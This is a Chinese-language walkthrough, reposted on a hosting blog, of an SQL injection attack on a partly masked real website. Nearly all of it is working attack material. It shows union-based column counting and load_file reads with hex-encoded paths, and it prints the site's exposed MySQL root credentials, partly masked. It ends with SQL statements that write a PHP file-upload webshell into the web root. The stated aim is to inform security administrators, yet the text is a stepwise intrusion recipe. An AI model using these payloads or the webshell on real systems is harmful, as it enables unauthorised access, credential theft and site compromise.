实例讲解PHP入侵

PHP入侵是一种黑客比较常用的入侵方式,PHP入侵的操作简单和效果初中是其广为流传的原因。今天我们就通过一次简单的PHP入侵来看一下PHP入侵的全过程,其目的是为了企业安全管理员能够洞悉PHP入侵技术,提高安全防护水平。

测试站点如下

http://www.******.com

找个踩点

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830

提交一个 ‘

返回结果

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in

/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 135

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in

/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 140

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in

/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 154

路径出来了,继续安检.

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830'and 1=1 #

返回错误,不是字符型.

注明:%23是#

提交 and 1=1 返回正常

提交 and 1=2 返回不正常

接下来就是 union 语句

and 1=1 union select 1 返回不正常

and 1=1 union select 1,2 返回不正常

and 1=1 union select 1,2,3 返回不正常

and 1=1 union select 1,2,3,4 返回不正常

and 1=1 union select 1,2,3,4,5 返回不正常

and 1=1 union select 1,2,3,4,5,6 返回不正常

and 1=1 union select 1,2,3,4,5,6,7 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8,9 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8,9,10 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 返回正常

猜到 14 就正常了 继续PHP入侵的下一步.

一般这样的站点基本上后台是不可能那么容易让我们找到的..

还是先看看有没有再说吧..

猜猜常用的路径.

login.php

admin.php

admin_login.php

admin_index.php

admin/login.php

admin/admin.php

admin/admin_login.php

admin/admin_index.php

manage/index.php

manage/login.php

manage/admin_login.php

manage/admin_index.php

等等.有耐心的可以慢慢去猜.就算猜到了也没什么用.

我们还是用比较直接的方法吧.直接用 load_file 读取文件内容

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
里面的 and 1=1 变成 and 1=2

返回结果如下:

2

就在2的位置暴了我们需要的文件内容.

我们就从 /var/www/html/zhaobiao/zhaobiao_hy_show.php

直接用 load_fi

le(‘/var/www/html/zhaobiao/zhaobiao_hy_show.php’)

前提是要把 /var/www/html/zhaobiao/zhaobiao_hy_show.php 转换成 16 进制

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,load_file 

0x2F7661722F7777772F68746D6C2F7A68616F6269616F2F7A68616F6269616F5F68795F73

686F772E706870),3,4,5,6,7,8,9,10,11,12,13,14  

返回结果

 

  1. 0 or $regdate>mysql_result($query,0,'yxdate')){?>   
  2.  
  3.   ",mysql_result($query,0,'sm'));?>   

不要管这些,直接查看源文件找到了一个 inc.php 的文件 然后配合前面的路径

/var/www/html/inc.php

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,load_file

(0x2F7661722F7777772F68746D6C2F696E632E706870),3,4,5,6,7,8,9,10,11,12,13,14

暴一下 返回看不到内容 直接查看源文件

  1. <? 
  2. $myconn=mysql_connect('localhost','root','www.******.comy0p5h1i0');  
  3. mysql_select_db('mlk');  
  4. ?> 

Mysql 直接暴出来了..

下一步就是登陆 Mysql 然后插入自己准备好的小马..

  1. use mlk;  
  2. create table mmxy (cmd TEXT);  
  3. insert into mmxy values('<?php');  
  4. insert into mmxy values('$msg = copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]) ? "Successful" : "failure";');  
  5. insert into mmxy values('echo $msg;');  
  6. insert into mmxy values('?>');  
  7. insert into mmxy values('<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">');  
  8. insert into mmxy values('<input NAME="MyFile" TYPE="file">');  
  9. insert into mmxy values('<input VALUE="Up" TYPE="submit"></form>');  
  10. select * from mmxy into outfile '/var/www/html/zhaobiao/mmxy.php';  

 

【编辑推荐】

  1. 防止SQL注入攻击:网络管理员的前景展望
  2. ScanSafe:近期3波SQL注入攻击100万中国网站
  3. 图文详解网站SQL注入攻击解决全过程
  4. 有效预防SQL注入攻击的六脉神剑
  5. 防止SQL注入攻击:网络管理员的前景展望

     

     

文章来源网络,作者:管理,如若转载,请注明出处:https://shuyeidc.com/wp/144904.html<

(0)
管理的头像管理
上一篇2025-03-10 09:21
下一篇 2025-03-10 09:22

相关推荐

  • 云服务器和云虚拟主机怎么选?云服务器和虚拟主机区别

    云服务器适合业务增长快、需弹性扩展的场景,而云虚拟主机适合预算有限、技术门槛低的小型静态网站或测试环境,二者核心区别在于资源独享性与运维复杂度,核心差异解析:从底层架构到使用体验很多人容易混淆这两者,觉得它们都是“买空间建站”,它们的底层逻辑完全不同,云服务器(ECS)就像是你租了一整栋别墅,水电网络独立,你想……

    2026-06-29
    0
  • 赣州智慧旅游招聘是真的吗?赣州旅游人才招聘信息

    中级岗位(3-5年经验)月薪范围通常在6000-10000元,这类岗位需要独立负责项目模块,如独立运营一个抖音账号,或维护一个景区小程序的功能迭代,具备成功案例的候选人议价能力较强,高级岗位(5年以上经验)月薪范围通常在10000-20000元,部分核心管理岗可达更高,这类人才需要具备战略规划能力,如制定整个景……

    2026-06-29
    0
  • 赣州智能物联网车位锁如何管理?智能车位锁管理系统多少钱

    赣州智能物联网车位锁管理的核心在于通过云端平台实现远程控锁、状态实时监控及自动计费,彻底解决传统车位“被占难管”与“找位难”的痛点,在赣州这样的城市,随着机动车保有量的持续增长,老旧小区、商业综合体以及私人固定车位的资源矛盾日益凸显,传统的机械地锁或简易遥控锁,不仅操作繁琐,更无法实现数据化管理,引入智能物联网……

    2026-06-29
    0
  • 赣州智能消防栓好用吗,智能消防栓多少钱一个

    赣州智能消防栓通过物联网技术实现实时监测与远程报警,能显著降低火灾响应时间并提升城市消防安全管理水平,是目前智慧城市建设中不可或缺的基础设施,赣州智能消防栓的核心价值与应用场景传统消防栓往往存在“看不见、摸不着、用不了”的痛点,在赣州这样地形复杂、老城区与新城区并存的区域,传统设施的管理难度极大,智能消防栓的出……

    2026-06-29
    0
  • 云服务器和物理机到底有啥区别?

    云服务器本质上是虚拟化资源池中的弹性实例,而传统物理服务器是独占的硬件实体,前者胜在弹性与运维便捷,后者强在物理隔离与性能稳定,具体选择取决于业务对成本、扩展性及安全合规的权衡,很多人初次接触服务器时,容易把“云服务器”和“传统物理服务器”混为一谈,觉得它们都是用来跑网站或存数据的盒子,这两者的底层逻辑完全不同……

    2026-06-29
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注